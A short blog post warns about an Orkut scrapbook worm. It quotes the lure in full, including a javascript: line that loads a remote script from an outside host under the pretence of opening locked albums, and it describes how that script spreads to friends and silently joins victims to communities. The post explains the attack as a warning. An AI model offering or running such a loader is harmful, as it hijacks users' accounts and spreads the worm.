Yesterday, after a long time when i checked my orkut scarpbook. I found same scrap from 4 friend of mine. That scrap was
Heya !!
how are you??
Do you know there was a profile in news last night
link :- click here
The about me of This Profile Is Superb.
The link provided in this scrap was pointing to a profile who claims to be Bani (the MTV ROADIES 4.0 girl). The about section of this profile instructs to execute a javascript injection by which we can open any locked album. The about section goes like this
about me:
JOIN ME HERE:- BANI "MTV ROADIES" GIRL
VIEW ANYONE'S LOCKED ALBUM NOW.
1.) Goto the profile of which you need
to view the album
2.) Copy the javascript given below and paste
it to your address bar where you write www.orkut.com And hit enter key
3.) Now wait for the images to be loaded
as it will take a few minutes .
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://mrnoobrulez.110mb.com/orkut0.js';void(0)
And Yes I have Uploaded My New Picture But
Please Dont use this trick on my album
This javascript injection appends a new script tag in the page whose source is actually available at http://mrnoobrulez.110mb.com/orkut0.js. Now this is the real script… who ever wrote this script is a true hacker. This scripts performs following three tasks
- It sends the same scrap to all friends of victim
- It hiddenly adds the user to 3 communities [ Love is in the air , Fastest community ever and Orkut]
- Displays text about basics of SQL injections
I think owner of these communities is spreading this scrap and till now he has got millions of members for his communities. The source code of this javascript is attached here. So dont execute a javascript injection if you exactly dont know what it does.




